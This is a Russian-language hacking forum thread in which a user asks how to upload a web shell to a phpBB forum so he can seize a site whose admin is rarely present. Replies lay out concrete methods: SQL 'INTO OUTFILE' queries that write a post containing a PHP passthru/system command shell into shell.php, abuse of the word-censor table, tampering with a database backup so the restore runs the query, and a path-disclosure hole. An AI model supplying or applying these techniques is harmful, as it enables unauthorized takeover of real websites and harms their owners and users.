Здрасте, народ! :)
Столкнулся с проблемой... Мона ли на phpBB залить шел. Если да то как расскажите подробней.
Хочу сайт забрать, а то админ на сайте появляется раз в год и них ничё не делает :(

SELECT post_text FROM phpbb_posts_text WHERE post_id =1234 INTO OUTFILE "/full/path/to/rw/dir/shell.php"

смотрим номер нашего поста, подставляем в post_id а запостить нужно
<? passthru($cmd); ?>

путь можно узнать дырой в скрипте /db/oracle.php

SELECT word FROM phpbb_words WHERE word_id = 1 INTO OUTFILE "/full/path/to/rw/dir/shell.php"

добавляем в админке наше слово (сами знаете какое) и восстанавливаем базу

Если помог, то репу мне повысь=))) А вообще Мемберу нужно самому уметь пользоваться поиском...=))) (не в обиду)

<<YaYaYa>> Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...

А что ты не понял? Через мускул заливаешь шел вот таким образом... по-моему все ясно

а ты себя не мучай посмотри на rst.void.ru там вроде есть экспл для заливки шелла=)
не понял как это))
инфа с секьюрити сайтов канешна=)
сначала создаем топик с <? system($cmd) ?>
потом с помощью скуля той строкой которую ЙаЙа дал записываем название той темы в файл=) так что ЙаЙа повысь репу за инфу а мне за объяснение гы)

m0nzt3r поддерживаю=))

Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...
это вставляеться в место где проходит скуль инъекция.
но врядли пройдет такая маза, думаю прав не хватит

Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления.
Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку))
Тогда мы бекапаем базу, потом редактируем чтобы выполнялся
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
выполняется
vorishka думаю теперь понятно будет.........

k1b0rg ну может у него доступ в админку есть))

ну может у него доступ в админку есть))
Если бы у него не было бы лоступа в админку, то он бы спрашивал как получить этот самый доступ, а не как залить шел. Я так думаю)))
А вообще по моим постам думаю все ясно. Хотя это не всегда проходит, т.к. папка куда ты хочешь залить шел должна быть открыта на запись, а таких папок иногда бывает не много=)) Поэтому придется помутить с этим.
ЗЫ жадные вы на репутацию)

А каким образом можно узнать путь к директории с форумом? Заливать-то будем в папку /forum/images/.
А как узнать полный путь?

я не понял, у меня на локалхосте проходит SELECT '<?php echo'Hello, world!'; ?>' bla-bla-bla без создания всяких топиков!